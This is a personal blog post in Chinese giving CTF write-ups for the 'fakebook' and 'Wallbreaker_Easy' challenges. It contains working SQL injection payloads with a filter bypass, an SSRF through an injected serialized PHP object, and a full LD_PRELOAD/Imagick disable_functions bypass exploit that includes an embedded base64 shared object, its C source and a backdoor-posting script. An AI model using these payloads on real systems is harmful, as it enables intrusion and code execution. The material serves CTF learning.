总算把各种事情忙完 可以开始刷题了

00x0 网鼎杯fakebook

题目有一个注册 一个登陆 登陆上去之后可以看到已经注册的账户信息
简单fuzz一下发现注册的时候如果语句没有闭合会php报错 然后又在用户信息查看页面里找到一个注入点
试图报错注入被过滤了 试了一下居然是过滤的0x...把updatexml里的0x换成别的字符就行了
成功注出库名

之后就是很常规的报错注入了
表名users
列名no,username,passwd,data

我以为这个题注入就结束了
结果data是这么个东西
在这里尝试用mid截取取出全部字符康康这个data到底是个啥数据
然后发现了一个奇妙的情况:
updatexml回显的第一个字符不能是数字 如果是数字就会是空
我的选择是每次截取一个字符,然后每次都取第二个字符放到数据里 再加上字符串的第一个字符(希望没有连着两个数字的)
人懒 写个脚本跑一下

import requests
import re
def requ(i):
    url='http://dc46bee2-e01b-427e-914e-b62f7b0a27d6.node3.buuoj.cn/view.php?no='
    payload="6 and updatexml('~',concat(1,(select substr(group_concat(data),{},2) from users),'~'),2)".format(str(i))
    a=requests.get(url+payload)
    if a.status_code!=200:
        return requ(i)
   # print(a.text)
   # print(re.findall(r"query error! \(XPATH syntax error: '(.*)~",a.text)[0][1:2])
    return re.findall(r"query error! \(XPATH syntax error: '(.*)~",a.text)[0][1:2]
a='O'
for i in range(1,2000):
    a+=requ(i)
    print(a)


貌似还是有两个数字连着的 影响不大 影响不大 因为内容明显是刚才注册时候写的。。
emmmmm这个二次注入貌似用处不大
那应该还有反序列化 得先想办法找到源码
看到了robots.txt里的/user.php.bak
打开康康

<?php

class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

一段莫名其妙的源码 没有反序列化点
get方法显然有一个ssrf 而正则的要求比较严格
似乎变成了一个ssrf绕过的题目
试了半天也没试出来能绕过那个正则的判断...
后来自己手绘了个数据库结构图,猜了下后端的逻辑可能是根据no 然后查对应的data数据 既然这里有注入 就可以用union select 控制data的序列化数据内容

0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:6:"ckj123";s:3:"age";i:111111;s:4:"blog";s:29:"file:///var/www/html/flag.php";} '

union select前面一定要放上不存在的no值 不然会取到正常的序列化数据
题目是有过滤的 然后加了个\/**\/绕过去了 这是什么神仙正则
最后flag在源代码的data://中的base64数据里

00x1 Wallbreaker_Easy

这个题不查资料真的是一点思路都没 - -
不得不说自己对这一块实在是太不熟了
所以特意花很多时间查了各种相关的资料
原理之后再专门写一篇总结。。(因为我自己也云里雾里)
这个题光复现就打了一晚上 - -打崩了七八个容器才打出来
先放exp

import requests
import base64

url = "http://95c9ea66-c502-4c12-a3bd-26b8f62e9c14.node3.buuoj.cn"
dir = "/tmp/2873b3cf774fd7838702495c742ae2c0"
cmd = '''
<pre>hello???????<br><?php echo 'hello';?><br>
<?php
$dir = "{0}";
file_put_contents("{0}/P3rh4ps.so",base64_decode('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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAGAAAAAAAAAAAAAAAAAABQBgAAAAAAAAAAAAAAAAAAEA4gAAAAAAABAAAAAAAAAIIAAAAAAAAADAAAAAAAAAB4BQAAAAAAAA0AAAAAAAAA2AYAAAAAAAAZAAAAAAAAAPANIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAAAA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAaAMAAAAAAAAGAAAAAAAAADACAAAAAAAACgAAAAAAAACwAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAABIAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAADAFAAAAAAAABwAAAAAAAABYBAAAAAAAAAgAAAAAAAAA2AAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAAA4BAAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAABgEAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgOIAAAAAAAAAAAAAAAAAAAAAAAAAAAALYFAAAAAAAAxgUAAAAAAADWBQAAAAAAAEdDQzogKEdOVSkgNC44LjUgMjAxNTA2MjMgKFJlZCBIYXQgNC44LjUtMzkpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEAyAEAAAAAAAAAAAAAAAAAAAAAAAADAAIA8AEAAAAAAAAAAAAAAAAAAAAAAAADAAMAMAIAAAAAAAAAAAAAAAAAAAAAAAADAAQAaAMAAAAAAAAAAAAAAAAAAAAAAAADAAUAGAQAAAAAAAAAAAAAAAAAAAAAAAADAAYAOAQAAAAAAAAAAAAAAAAAAAAAAAADAAcAWAQAAAAAAAAAAAAAAAAAAAAAAAADAAgAMAUAAAAAAAAAAAAAAAAAAAAAAAADAAkAeAUAAAAAAAAAAAAAAAAAAAAAAAADAAoAoAUAAAAAAAAAAAAAAAAAAAAAAAADAAsA4AUAAAAAAAAAAAAAAAAAAAAAAAADAAwA2AYAAAAAAAAAAAAAAAAAAAAAAAADAA0A6AYAAAAAAAAAAAAAAAAAAAAAAAADAA4AKAcAAAAAAAAAAAAAAAAAAAAAAAADAA8ASAcAAAAAAAAAAAAAAAAAAAAAAAADABAA8A0gAAAAAAAAAAAAAAAAAAAAAAADABEAAA4gAAAAAAAAAAAAAAAAAAAAAAADABIACA4gAAAAAAAAAAAAAAAAAAAAAAADABMAEA4gAAAAAAAAAAAAAAAAAAAAAAADABQAGA4gAAAAAAAAAAAAAAAAAAAAAAADABUA2A8gAAAAAAAAAAAAAAAAAAAAAAADABYAABAgAAAAAAAAAAAAAAAAAAAAAAADABcAMBAgAAAAAAAAAAAAAAAAAAAAAAADABgAAAAAAAAAAAAAAAAAAAAAAAEAAAAEAPH/AAAAAAAAAAAAAAAAAAAAAAwAAAABABIACA4gAAAAAAAAAAAAAAAAABkAAAACAAsA4AUAAAAAAAAAAAAAAAAAABsAAAACAAsAEAYAAAAAAAAAAAAAAAAAAC4AAAACAAsAUAYAAAAAAAAAAAAAAAAAAEQAAAABABcAMBAgAAAAAAABAAAAAAAAAFMAAAABABEAAA4gAAAAAAAAAAAAAAAAAHoAAAACAAsAkAYAAAAAAAAAAAAAAAAAAIYAAAABABAA8A0gAAAAAAAAAAAAAAAAAKUAAAAEAPH/AAAAAAAAAAAAAAAAAAAAAAEAAAAEAPH/AAAAAAAAAAAAAAAAAAAAAK8AAAABAA8AqAcAAAAAAAAAAAAAAAAAAL0AAAABABIACA4gAAAAAAAAAAAAAAAAAAAAAAAEAPH/AAAAAAAAAAAAAAAAAAAAAMkAAAABABMAEA4gAAAAAAAAAAAAAAAAANYAAAABABQAGA4gAAAAAAAAAAAAAAAAAN8AAAAAAA4AKAcAAAAAAAAAAAAAAAAAAPIAAAABABYAMBAgAAAAAAAAAAAAAAAAAP4AAAABABYAABAgAAAAAAAAAAAAAAAAABQBAAAgAAAAAAAAAAAAAAAAAAAAAAAAADABAAASAAsAxQYAAAAAAAASAAAAAAAAADYBAAAQABYAMBAgAAAAAAAAAAAAAAAAAD0BAAASAAwA2AYAAAAAAAAAAAAAAAAAAEMBAAASAAAAAAAAAAAAAAAAAAAAAAAAAFcBAAAgAAAAAAAAAAAAAAAAAAAAAAAAAGYBAAAQABcAOBAgAAAAAAAAAAAAAAAAAGsBAAAQABcAMBAgAAAAAAAAAAAAAAAAAHcBAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIsBAAAgAAAAAAAAAAAAAAAAAAAAAAAAAKUBAAAiAAAAAAAAAAAAAAAAAAAAAAAAAMEBAAASAAkAeAUAAAAAAAAAAAAAAAAAAABjcnRzdHVmZi5jAF9fSkNSX0xJU1RfXwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjYzNTUAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AFAzcmg0cHMuYwBfX0ZSQU1FX0VORF9fAF9fSkNSX0VORF9fAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUNfRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBhbmdlbABfZWRhdGEAX2ZpbmkAc3lzdGVtQEBHTElCQ18yLjIuNQBfX2dtb25fc3RhcnRfXwBfZW5kAF9fYnNzX3N0YXJ0AF9Kdl9SZWdpc3RlckNsYXNzZXMAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4yLjUAX2luaXQAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALm5vdGUuZ251LmJ1aWxkLWlkAC5nbnUuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWxhLmR5bgAucmVsYS5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuamNyAC5kYXRhLnJlbC5ybwAuZHluYW1pYwAuZ290AC5nb3QucGx0AC5ic3MALmNvbW1lbnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAHAAAAAgAAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAuAAAA9v//bwIAAAAAAAAA8AEAAAAAAADwAQAAAAAAADwAAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAOAAAAAsAAAACAAAAAAAAADACAAAAAAAAMAIAAAAAAAA4AQAAAAAAAAQAAAABAAAACAAAAAAAAAAYAAAAAAAAAEAAAAADAAAAAgAAAAAAAABoAwAAAAAAAGgDAAAAAAAAsAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABIAAAA////bwIAAAAAAAAAGAQAAAAAAAAYBAAAAAAAABoAAAAAAAAAAwAAAAAAAAACAAAAAAAAAAIAAAAAAAAAVQAAAP7//28CAAAAAAAAADgEAAAAAAAAOAQAAAAAAAAgAAAAAAAAAAQAAAABAAAACAAAAAAAAAAAAAAAAAAAAGQAAAAEAAAAAgAAAAAAAABYBAAAAAAAAFgEAAAAAAAA2AAAAAAAAAADAAAAAAAAAAgAAAAAAAAAGAAAAAAAAABuAAAABAAAAEIAAAAAAAAAMAUAAAAAAAAwBQAAAAAAAEgAAAAAAAAAAwAAABYAAAAIAAAAAAAAABgAAAAAAAAAeAAAAAEAAAAGAAAAAAAAAHgFAAAAAAAAeAUAAAAAAAAaAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAHMAAAABAAAABgAAAAAAAACgBQAAAAAAAKAFAAAAAAAAQAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAB+AAAAAQAAAAYAAAAAAAAA4AUAAAAAAADgBQAAAAAAAPcAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAhAAAAAEAAAAGAAAAAAAAANgGAAAAAAAA2AYAAAAAAAAJAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAIoAAAABAAAAAgAAAAAAAADoBgAAAAAAAOgGAAAAAAAAPgAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACSAAAAAQAAAAIAAAAAAAAAKAcAAAAAAAAoBwAAAAAAABwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAoAAAAAEAAAACAAAAAAAAAEgHAAAAAAAASAcAAAAAAABkAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAKoAAAAOAAAAAwAAAAAAAADwDSAAAAAAAPANAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAAC2AAAADwAAAAMAAAAAAAAAAA4gAAAAAAAADgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAwgAAAAEAAAADAAAAAAAAAAgOIAAAAAAACA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAMcAAAABAAAAAwAAAAAAAAAQDiAAAAAAABAOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADUAAAABgAAAAMAAAAAAAAAGA4gAAAAAAAYDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAA3QAAAAEAAAADAAAAAAAAANgPIAAAAAAA2A8AAAAAAAAoAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAOIAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADrAAAACAAAAAMAAAAAAAAAMBAgAAAAAAAwEAAAAAAAAAgAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA8AAAAAEAAAAwAAAAAAAAAAAAAAAAAAAAMBAAAAAAAAAtAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAGAQAAAAAAAAQAUAAAAAAAAaAAAALAAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAACgFQAAAAAAAMcBAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAZxcAAAAAAAD5AAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA=='));
putenv("LD_PRELOAD={0}/P3rh4ps.so");
file_put_contents("{0}/P3rh4ps.wmv","sssss");
$tocken = new Imagick('{0}/P3rh4ps.wmv');
?>
</pre>
'''.format(dir)

payload = '''
file_put_contents('%s/evil',base64_decode("%s"));
include "%s/evil";
'''%(dir,base64.b64encode(cmd),dir)

print requests.post(url, data={'backdoor': payload }).content

print requests.post(url,data={'backdoor':"print_r(scandir('%s'));"%dir}).content
print requests.post(url,data={'backdoor':"echo file_get_contents('%s/P3rh4ps.txt');"%dir}).content

流程就是先自己在linux上编译一个so文件 然后用php获取so文件的base64值 然后写入
再用putenv劫持环境变量 用Imagick执行我们注入进去的so文件
最后是把上面的命令写入到一个php文件中 然后用include执行

exp试了好多次都会502 然后重新编译了一遍so文件就莫名其妙OK了。。 感天动地
so文件代码:

#include <stdlib.h>
#include <stdio.h>
__attribute__ ((__constructor__)) void angel (void){
    system("/readflag > /tmp/2873b3cf774fd7838702495c742ae2c0/P3rh4ps.txt");
}

获取base64值的php文件:

<?php
file_put_contents('1.txt',base64_encode(file_get_contents('P3rh4ps.so')));
?>

用python做题还是很香的- - 流程比较复杂的题可以减少很多步骤的重复 节约时间

分类: 技术

0 条评论

发表评论

邮箱地址不会被公开。 必填项已用*标注